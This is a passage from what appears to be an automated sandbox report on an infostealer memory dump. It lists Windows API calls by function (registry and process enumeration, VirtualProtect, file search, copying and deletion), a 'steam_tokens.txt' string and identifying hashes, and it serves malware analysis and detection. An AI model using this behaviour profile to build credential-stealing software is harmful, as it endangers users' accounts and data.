Part of subcall function 00CB8100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,008001F0,00000000,?,00CC0E2C,00000000,?,00000000), ref: 00CB8130
Part of subcall function 00CB8100: HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,008001F0,00000000,?,00CC0E2C,00000000,?,00000000,00000000), ref: 00CB8137
Part of subcall function 00CB8100: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00CB8158
Part of subcall function 00CB8100: __aulldiv.LIBCMT ref: 00CB8172
Part of subcall function 00CB8100: __aulldiv.LIBCMT ref: 00CB8180
Part of subcall function 00CB8100: wsprintfA.USER32 ref: 00CB81AC

Part of subcall function 00CB87C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00CC0E28,00000000,?), ref: 00CB882F
Part of subcall function 00CB87C0: HeapAlloc.KERNEL32(00000000,?,?,?,?,00CC0E28,00000000,?), ref: 00CB8836
Part of subcall function 00CB87C0: wsprintfA.USER32 ref: 00CB8850

Part of subcall function 00CB8320: RegOpenKeyExA.KERNEL32(00000000,007FE138,00000000,00020019,00000000,00CC05B6), ref: 00CB83A4

Part of subcall function 00CB8320: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00CB8426
Part of subcall function 00CB8320: wsprintfA.USER32 ref: 00CB8459
Part of subcall function 00CB8320: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00CB847B
Part of subcall function 00CB8320: RegCloseKey.ADVAPI32(00000000), ref: 00CB848C
Part of subcall function 00CB8320: RegCloseKey.ADVAPI32(00000000), ref: 00CB8499

Part of subcall function 00CB8680: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00CC05B7), ref: 00CB86CA
Part of subcall function 00CB8680: Process32First.KERNEL32(?,00000128), ref: 00CB86DE
Part of subcall function 00CB8680: Process32Next.KERNEL32(?,00000128), ref: 00CB86F3
Part of subcall function 00CB8680: CloseHandle.KERNEL32(?), ref: 00CB8761

lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00CB265B

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUser__aulldivlstrcatlstrlen$ComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID:
API String ID: 2204142833-0
Opcode ID: 2dde0362a63f3244b8ee1a20d5b6349fc16d90951c08b8f6e5d484b62ec0a5de
Instruction ID: 051142ecdb2d0369699ce03da41c5312a7c925ac5e01efa2d05c2c99255974d0
Opcode Fuzzy Hash: 2dde0362a63f3244b8ee1a20d5b6349fc16d90951c08b8f6e5d484b62ec0a5de
Instruction Fuzzy Hash: CD726E72C10118BADB19FB91DCA2EEE733CAF54300F5442A9B15662491EF313B49EF66

Function 00CA6BE0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(E9FC458B,087400FC,00000040,00000040), ref: 00CA6C9F

Strings

@, xrefs: 00CA6C79

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: @
API String ID: 544645111-2766056989
Opcode ID: 993b8f91ebd94017e01f48f2354fb0d23a51e413f8a178b0471d5a99620e05a5
Instruction ID: fdd44d5c815e9cc1a22b4d8e94629995c9a873c948e749bed4584fac278c1e35
Opcode Fuzzy Hash: 993b8f91ebd94017e01f48f2354fb0d23a51e413f8a178b0471d5a99620e05a5
Instruction Fuzzy Hash: 1D21FA74A00209EFDB04CF99C594BADBBB1FF4931CF148199D599AB341D735AA81DF80

Function 00CA6D40 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cc5ca812564a7349ada5c59b38ebe875b6b160fc35a73ee11e7abaddcd1cd9a
Instruction ID: 74469f606a7a35200fdd631389033f9da9f0647f7a64958b26f57143796711c1
Opcode Fuzzy Hash: 9cc5ca812564a7349ada5c59b38ebe875b6b160fc35a73ee11e7abaddcd1cd9a
Instruction Fuzzy Hash: 5F6117B4D0021AEFCB14CF94E984BEEB7B0BB45308F188598E42967280D775AF94DF91

Function 00CB4BB0 Relevance: 3.1, APIs: 2, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB8DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00CB8E0B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00CB4BEA
lstrcatA.KERNEL32(?,00800E18), ref: 00CB4C08

Part of subcall function 00CB4910: wsprintfA.USER32 ref: 00CB492C
Part of subcall function 00CB4910: FindFirstFileA.KERNEL32(?,?), ref: 00CB4943

Part of subcall function 00CB4910: StrCmpCA.SHLWAPI(?,00CC0FDC), ref: 00CB4971
Part of subcall function 00CB4910: StrCmpCA.SHLWAPI(?,00CC0FE0), ref: 00CB4987
Part of subcall function 00CB4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00CB4B7D
Part of subcall function 00CB4910: FindClose.KERNEL32(000000FF), ref: 00CB4B92

Part of subcall function 00CB4910: wsprintfA.USER32 ref: 00CB49B0
Part of subcall function 00CB4910: StrCmpCA.SHLWAPI(?,00CC08D2), ref: 00CB49C5
Part of subcall function 00CB4910: wsprintfA.USER32 ref: 00CB49E2
Part of subcall function 00CB4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00CB4A1E
Part of subcall function 00CB4910: lstrcatA.KERNEL32(?,007FD428,?,000003E8), ref: 00CB4A4A
Part of subcall function 00CB4910: lstrcatA.KERNEL32(?,00CC0FF8), ref: 00CB4A5C
Part of subcall function 00CB4910: lstrcatA.KERNEL32(?,?), ref: 00CB4A70
Part of subcall function 00CB4910: lstrcatA.KERNEL32(?,00CC0FFC), ref: 00CB4A82
Part of subcall function 00CB4910: lstrcatA.KERNEL32(?,?), ref: 00CB4A96
Part of subcall function 00CB4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00CB4AAC
Part of subcall function 00CB4910: DeleteFileA.KERNEL32(?), ref: 00CB4B31

Part of subcall function 00CB4910: wsprintfA.USER32 ref: 00CB4A07

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: 90fc2e38e5daa7dff6cd91a687b393cf4e85c01d1605d20bc875fae6042c2c6d
Instruction ID: 37f2f1c4402c2a00c1649a725a5e632ec4f040e06e8a18170e537c8ad3c7fe50
Opcode Fuzzy Hash: 90fc2e38e5daa7dff6cd91a687b393cf4e85c01d1605d20bc875fae6042c2c6d
Instruction Fuzzy Hash: 7541C9BB900108ABD754F7A0EC83EFE337DA785700F04855CB5496A186ED756B8C9B92

Function 00CB5050 Relevance: 3.0, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB8DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00CB8E0B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00CB508A
lstrcatA.KERNEL32(?,007FFEA8), ref: 00CB50A8

Part of subcall function 00CB4910: wsprintfA.USER32 ref: 00CB492C
Part of subcall function 00CB4910: FindFirstFileA.KERNEL32(?,?), ref: 00CB4943

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: 2ac1f2ba198e147f5cf1f6551e4dca21edc4af03350fc0d7af9c555bab5b7700
Instruction ID: e3fb1f3178f996d384a4ce3900b6f1ddc19753a1b14b2c2832489cba3b1ec8f3
Opcode Fuzzy Hash: 2ac1f2ba198e147f5cf1f6551e4dca21edc4af03350fc0d7af9c555bab5b7700
Instruction Fuzzy Hash: 04019F76D0010C6BCB54FBB0DC87DED737C9B54700F044558B68566191EE71A68CDBA2

Function 00CB5100 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

Part of subcall function 00CBA820: lstrlenA.KERNEL32(00000000,?,?,00CB5B54,00CC0ADB,00CC0ADA,?,?,00CB6B16,00000000,?,007F1348,?,00CC110C,?,00000000), ref: 00CBA82B
Part of subcall function 00CBA820: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA885

lstrlenA.KERNEL32(00000000,00000000,00CC0ACA,?,?,?,?,?,?,00CB610B,?), ref: 00CB512A

Strings

steam_tokens.txt, xrefs: 00CB513F

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: bc900d041007dfbe5cd159c8360b977ebb322bb82410cb2547a82006a866a3e2
Instruction ID: 2ce6846316bc08501cb4d5f5477f05c3a3045564a33b6cbbb99119d73b403a71
Opcode Fuzzy Hash: bc900d041007dfbe5cd159c8360b977ebb322bb82410cb2547a82006a866a3e2
Instruction Fuzzy Hash: 4EF01971D101087ACB18FBB0EC57EED773CAB54300F404268F89666492EF256A09E6A3

Function 00CB7ED0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00CC0E2C), ref: 00CB7F00
wsprintfA.USER32 ref: 00CB7F16

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 19c57421d77af44a77d87d7ed92172d80b6828e3e00283a854fb4731c8a263fe
Instruction ID: 75c5ba4a7b766979eadcd34229d1135a72fa42f5a7d20f2f0c586ea28ee0f928
Opcode Fuzzy Hash: 19c57421d77af44a77d87d7ed92172d80b6828e3e00283a854fb4731c8a263fe
Instruction Fuzzy Hash: 18F06DB1A04248EBCB14CF85DC45FAAB7BCFB48B24F00066AF915A3280D77569048BE5

Function 00CAB4F0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

Part of subcall function 00CBA9B0: lstrlenA.KERNEL32(?,00CC1110,?,00000000,00CC0AEF), ref: 00CBA9C5
Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
Part of subcall function 00CBA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00CBAA12

Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
Part of subcall function 00CBA920: lstrcatA.KERNEL32(00000000), ref: 00CBA982

Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0AEF), ref: 00CBA905

Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6

Part of subcall function 00CA9E10: memcmp.MSVCRT ref: 00CA9E2D

lstrlenA.KERNEL32(00000000), ref: 00CAB9C2
lstrlenA.KERNEL32(00000000), ref: 00CAB9D6

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
